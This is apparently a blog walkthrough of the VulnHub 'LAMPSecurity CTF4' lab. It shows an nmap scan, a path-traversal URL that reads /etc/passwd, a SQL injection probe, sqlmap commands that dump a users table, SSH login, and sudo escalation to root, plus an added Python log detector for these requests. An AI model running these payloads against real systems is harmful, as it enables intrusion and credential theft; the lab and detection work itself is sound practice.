Today we are going to see another CTF “LAMPSecurity CTF4” (https://www.vulnhub.com/entry/lampsecurity-ctf4,83/).
The difficulty level will be for beginners, and the main objective will be to get the root privilege of the target system.
The VM is password protected and intentionally the credentials were not provided. Let’s give our best to break and escalate the root privilege.
List of actions
1) Find the target
2) Scan for port and services
3) HTTP enumeration (LFI Exploitation)
4) SQLMAP scanning
5) Dump and crack the hashes
6) SSH login
7) Root privilege escalation
Find the target
Try to find out the target VM by executing the following command
Finally, we got our target 172.16.2.45
Scan for port and services
In this step, we will scan for active ports and the running services
nmap -A 172.16.2.45
Output
Port 22 ssh OpenSSH 4.3 Open
Port 25 SMTP Sendmail Open
Port 80 HTTP Apache Open
HTTP enumeration (LFI Exploitation)
Let’s navigate to the web application on port 80
Now when I put the below string in the browser address bar, it exposes an LFI flaw: the page parameter is used as a file path, so the server displays its /etc/passwd file.
http://172.16.2.45/index.html?page=../../../../../../etc/passwd
Also, I found a SQL warning after appending a single quote (') to the end of the page URL.
http://172.16.2.45/index.html?page=blog&title=Blog&id=2'
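Both requests above leave a recognisable trace in the web server's access log. The following added example (not part of the original walkthrough) flags them in constructed Apache-style log lines; the log format, the client addresses, and the rule that page is a simple token and id an integer are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed access-log lines (sample data, not captured from the VM).
SAMPLE_LOG = """\
192.0.2.10 - - [01/Jan/2024:10:00:01 +0000] "GET /index.html?page=blog&title=Blog&id=2 HTTP/1.1" 200 5120
192.0.2.77 - - [01/Jan/2024:10:00:07 +0000] "GET /index.html?page=../../../../../../etc/passwd HTTP/1.1" 200 1843
192.0.2.77 - - [01/Jan/2024:10:00:15 +0000] "GET /index.html?page=blog&title=Blog&id=2%27 HTTP/1.1" 200 912
"""

REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
TRAVERSAL = re.compile(r'(^|[\\/])\.\.([\\/]|$)')  # a ".." path segment
PAGE_OK = re.compile(r'^[A-Za-z0-9_-]+$')  # assumption: page names are simple tokens
ID_OK = re.compile(r'^\d+$')               # assumption: id is a plain integer

def fully_decode(value, rounds=3):
    """Normalise repeated percent-encoding before matching."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(line):
    """Return (client_ip, [findings]) for one log line, or None if unparsable."""
    m = REQUEST.match(line)
    if not m:
        return None
    ip, target = m.groups()
    params = parse_qs(urlsplit(target).query, keep_blank_values=True)
    findings = []
    for raw in params.get("page", []):
        page = fully_decode(raw)
        if TRAVERSAL.search(page):
            findings.append("path-traversal in page")
        elif not PAGE_OK.match(page):
            findings.append("unexpected page value")
    for raw in params.get("id", []):
        if not ID_OK.match(fully_decode(raw)):
            findings.append("non-numeric id")
    return ip, findings

def scan(log_text):
    """Return only the log entries that produced at least one finding."""
    results = [classify(line) for line in log_text.splitlines()]
    return [r for r in results if r and r[1]]

if __name__ == "__main__":
    for ip, findings in scan(SAMPLE_LOG):
        print(ip, findings)
```

The same two rules (page restricted to known names, id restricted to digits) are what the application itself should enforce before using either parameter.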
Scanning with SQLMAP
Let’s scan the database with SQLMAP by executing the below command
sqlmap -u "http://172.16.2.45/index.html?page=blog&title=Blog&id=5" -p id --tables
After the completion of the command, we will get several database details. But we will continue the enumeration with the ehks database.
Dump and crack the hashes
In this section, we will enumerate the ehks database to get the users table details
sqlmap -u "http://172.16.2.45/index.html?page=blog&title=Blog&id=5" -p id -D ehks -T users --dump
We have successfully got the usernames and their credentials in the output.
SSH login
Let us take any user credentials to get the shell using SSH
Yay! We got our first restricted shell on 172.16.2.45
Now let's check what restrictions are applied to the current user account
Execute sudo -l in the command shell and see the output.
The above output shows that there is no restriction on the user.
Root privilege escalation
Now I will try to get the root privilege by typing the below command
sudo -i
Wow! Finally, we have got the root privilege of the system.
Thanks for reading my article on this CTF challenge. Please give your valuable feedback on the same in the below comment section.